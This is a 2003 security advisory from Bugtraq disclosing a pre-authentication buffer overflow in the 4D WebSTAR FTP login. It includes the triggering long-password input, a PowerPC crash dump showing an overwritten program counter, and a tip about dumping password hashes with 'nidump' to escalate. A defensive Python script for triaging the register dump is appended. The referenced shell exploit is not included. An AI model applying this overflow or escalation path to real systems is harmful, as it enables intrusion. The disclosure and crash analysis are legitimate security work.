4D WebSTAR FTP Buffer Overflow.

From: B-r00t (br00t_at_blueyonder.co.uk)
Date: 09/12/03

    Date: Fri, 12 Sep 2003 00:36:22 +0100 (BST)
    To: bugtraq@securityfocus.com, vuln-dev@securityfocus.com


    Remote Vulnerability in 4D WebSTAR Server Suite.
    ================================================

    Date: 11.09.2003
    Author: B-r00t. 2003.
    Email: B-r00t <br00t@blueyonder.co.uk>

    Vendor: 4D.
    Reference: http://www.4d.com/products/webstar.html
    Versions: 4D WebSTAR 5.3.1 (Latest) => VULNERABLE.
    Tested: 4D WebSTAR 5.3.1 (Trial Version).

    Exploit: [attached] 4DWS_ftp.c - Gives a shell on port 6969.

    Description: There is a pre-authentication buffer overflow in the
                 login mechanism of the WebSTAR FTP service, as shown
                 below:

    $ ftp maki
    Connected to maki (192.168.0.69).
    220 FTP server ready.
    Name (maki:br00t): test
    331 User name OK, need password.
    Password: XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
    XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
    XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXabcd
    530 FTP login failed.
    Login failed.
    421 Service not available, remote server has closed connection

                 The following information is reported in the crash
                 logfile '/Users/webstar/Library/Logs/CrashReporter/WSWebServer.crash.log':

    **********

    Date/Time: 2003-09-08 09:25:24 +0100
    OS Version: 10.2.6 (Build 6L60)
    Host: maki

    Command: WSWebServer
    PID: 359

    Exception: EXC_BAD_ACCESS (0x0001)
    Codes: KERN_INVALID_ADDRESS (0x0001) at 0x61626364

    PPC Thread State:
      srr0: 0x61626364 srr1: 0x4000f030 vrsave: 0x00000000
       xer: 0x00000000 lr: 0x61626364 ctr: 0x90000e40 mq: 0x00000000
        r0: 0x61626364 r1: 0xf02874f0 r2: 0xa0007728 r3: 0xf0288cd0
        r4: 0xf02872e0 r5: 0x0000005e r6: 0x80808080 r7: 0x00000001
        r8: 0x30000000 r9: 0x00954e64 r10: 0xf02870aa r11: 0x00959e94
       r12: 0x00000000 r13: 0x00000000 r14: 0x00000000 r15: 0x00000000
       r16: 0x00000000 r17: 0x00000000 r18: 0x00000000 r19: 0x00000000
       r20: 0x00000000 r21: 0x00000000 r22: 0x00000000 r23: 0x0000000b
       r24: 0x00958fec r25: 0x00958fec r26: 0x58585858 r27: 0x58585858
       r28: 0x58585858 r29: 0x58585858 r30: 0x58585858 r31: 0x58585858

                 As can be seen from the crash dump, the application
                 has attempted to execute code at '0x61626364', which
                 is the ASCII code for 'abcd'. Being able to influence the
                 application's execution process means it is possible
                 for an attacker to execute arbitrary code and thus
                 gain access to the target machine. Fortunately, the
                 service is running as the 'webstar' user, which is not
                 an administrative account by default. However, once an
                 attacker has gained initial access to the target machine,
                 it is possible to access the system password hashes using
                 the 'nidump' utility and hence possibly gain admin (root)
                 privileges if these hashes are cracked.

    FIX: Disable the FTP service until a fix is available.

    --

    B#.
    ----------------------------------------------------
    Email : B-r00t <br00t@blueyonder.co.uk>
    Key fingerprint = 74F0 6A06 3E57 083A 4C9B
                      ED33 AD56 9E97 7101 5462
    "You Would Be Paranoid If They Were Watching You !!!"
    -----------------------------------------------------

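As an added triage example (not part of the advisory, and not 4D's or the author's code), the Python below parses the PPC register block quoted in the crash log and flags every register whose 32-bit value is made entirely of printable ASCII bytes. That is the check the author did by eye: srr0, lr and r0 hold 0x61626364 ('abcd') and r26..r31 hold 0x58585858 ('XXXX'), so the overwritten bytes reached saved control data, not just a local buffer. The register text is copied from the dump above and trimmed; the `name: 0xXXXXXXXX` line format is assumed from that dump.

```python
import re

# Register block copied from the crash log quoted in the advisory (trimmed).
# Registers made entirely of printable ASCII bytes show where the
# attacker-supplied input landed: 0x61626364 == 'abcd', 0x58585858 == 'XXXX'.
CRASH_LOG = """\
PPC Thread State:
  srr0: 0x61626364 srr1: 0x4000f030 vrsave: 0x00000000
   xer: 0x00000000 lr: 0x61626364 ctr: 0x90000e40 mq: 0x00000000
    r0: 0x61626364 r1: 0xf02874f0 r2: 0xa0007728 r3: 0xf0288cd0
    r4: 0xf02872e0 r5: 0x0000005e r6: 0x80808080 r7: 0x00000001
   r26: 0x58585858 r27: 0x58585858 r28: 0x58585858 r29: 0x58585858
"""

# 'name: 0xXXXXXXXX' pairs, as printed by the Mac OS X 10.2 CrashReporter.
REG_RE = re.compile(r"\b([a-z]+\d*):\s*0x([0-9a-fA-F]{8})")

def parse_registers(text):
    """Return {register name: int value} for every pair in the dump."""
    return {name: int(val, 16) for name, val in REG_RE.findall(text)}

def ascii_bytes(value):
    """Decode a 32-bit big-endian (PowerPC) register as text when every
    byte is printable ASCII; return None otherwise."""
    raw = value.to_bytes(4, "big")
    if all(0x20 <= b < 0x7F for b in raw):
        return raw.decode("ascii")
    return None

def triage(text):
    """Map each register that holds printable ASCII to its decoded string."""
    hits = {}
    for name, val in parse_registers(text).items():
        decoded = ascii_bytes(val)
        if decoded is not None:
            hits[name] = decoded
    return hits

def control_flow_hijacked(text):
    """True when the faulting PC (srr0) or link register (lr) was overwritten
    with input bytes, i.e. the overflow reached saved control data."""
    hits = triage(text)
    return "srr0" in hits or "lr" in hits

if __name__ == "__main__":
    for reg, decoded in sorted(triage(CRASH_LOG).items()):
        print(f"{reg:>6}: {decoded!r}")
    print("control-flow hijack:", control_flow_hijacked(CRASH_LOG))
```

The same check applied to a dump where srr0 and lr still point into the binary (no ASCII hit) distinguishes a plain read/write fault from an overflow that has reached the return address.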
